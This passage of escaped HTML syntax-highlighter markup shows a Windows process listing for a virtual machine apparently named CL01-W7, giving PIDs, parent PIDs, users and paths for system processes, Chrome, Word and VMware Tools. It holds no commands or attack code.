class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-27\" class=\"crayon-line\"><span class=\"crayon-cn\">1044<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">LOCAL <\/span><span class=\"crayon-i\">SERVICE<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-28\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">1156<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">NETWORK <\/span><span class=\"crayon-i\">SERVICE<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-29\" class=\"crayon-line\"><span class=\"crayon-cn\">1296<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">spoolsv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">System32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">spoolsv<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-30\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">1324<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">LOCAL <\/span><span class=\"crayon-i\">SERVICE<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-31\" class=\"crayon-line\"><span class=\"crayon-cn\">1360<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">4016<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">chrome<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">CL01<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">W7<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">user1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-v\">Files<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Google<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Chrome<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Application<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">chrome<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-32\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">1428<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">LOCAL <\/span><span class=\"crayon-i\">SERVICE<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-33\" class=\"crayon-line\"><span class=\"crayon-cn\">1476<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">vmtoolsd<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-v\">Files<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">VMware<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">VMware <\/span><span class=\"crayon-v\">Tools<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">vmtoolsd<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-34\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">1552<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">4016<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">WINWORD<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">EXE\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">CL01<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">W7<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">user1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-v\">Files<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">Microsoft <\/span><span class=\"crayon-v\">Office<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Office12<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">WINWORD<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">EXE<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-35\" class=\"crayon-line\"><span class=\"crayon-cn\">1692<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">TPAutoConnSvc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-v\">Files<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">VMware<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">VMware <\/span><span class=\"crayon-v\">Tools<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">TPAutoConnSvc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-36\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">1780<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">LOCAL <\/span><span class=\"crayon-i\">SERVICE<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">svchost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-37\" class=\"crayon-line\"><span class=\"crayon-cn\">1996<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">dllhost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">dllhost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-38\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">2052<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">872<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">taskeng<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">taskeng<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-39\" class=\"crayon-line\"><span class=\"crayon-cn\">2064<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">844<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">dwm<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">CL01<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">W7<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">user1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Dwm<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-40\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">2104<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">1956<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">explorer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">CL01<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">W7<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">user1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Explorer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">EXE<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-41\" class=\"crayon-line\"><span class=\"crayon-cn\">2112<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">512<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">taskhost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">CL01<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">W7<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">user1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">taskhost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-42\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">2332<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">2052<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">GoogleUpdate<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-e\">NT <\/span><span class=\"crayon-v\">AUTHORITY<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-v\">Files<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Google<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Update<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">GoogleUpdate<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-43\" class=\"crayon-line\"><span class=\"crayon-cn\">2352<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">1692<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">TPAutoConnect<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">CL01<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">W7<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">user1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-v\">Files<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">VMware<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">VMware <\/span><span class=\"crayon-v\">Tools<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">TPAutoConnect<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-44\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-cn\">2360<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">416<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-v\">conhost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">CL01<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">W7<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">user1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">system32<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">conhost<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">exe<\/span><\/div>\n<div id=\"crayon-55f29ee9765d0910404999-45\" class=\"crayon-line\"><span class=\"crayon-cn\">2428<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">2104<\/span><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-v\">vmtoolsd<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-i\">x86<\/span><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">CL01<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">W7<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-i\">user1<\/span><span class=\"crayon-h\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">Program <\/span><span class=\"crayon-v\">Files<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-v\">VMware<\/span><span class=\"crayon-sy\">\\<\/span><span class=\"crayon-e\">VMware <\/span><span class=\"crayon-v\">Tools<\/span><span 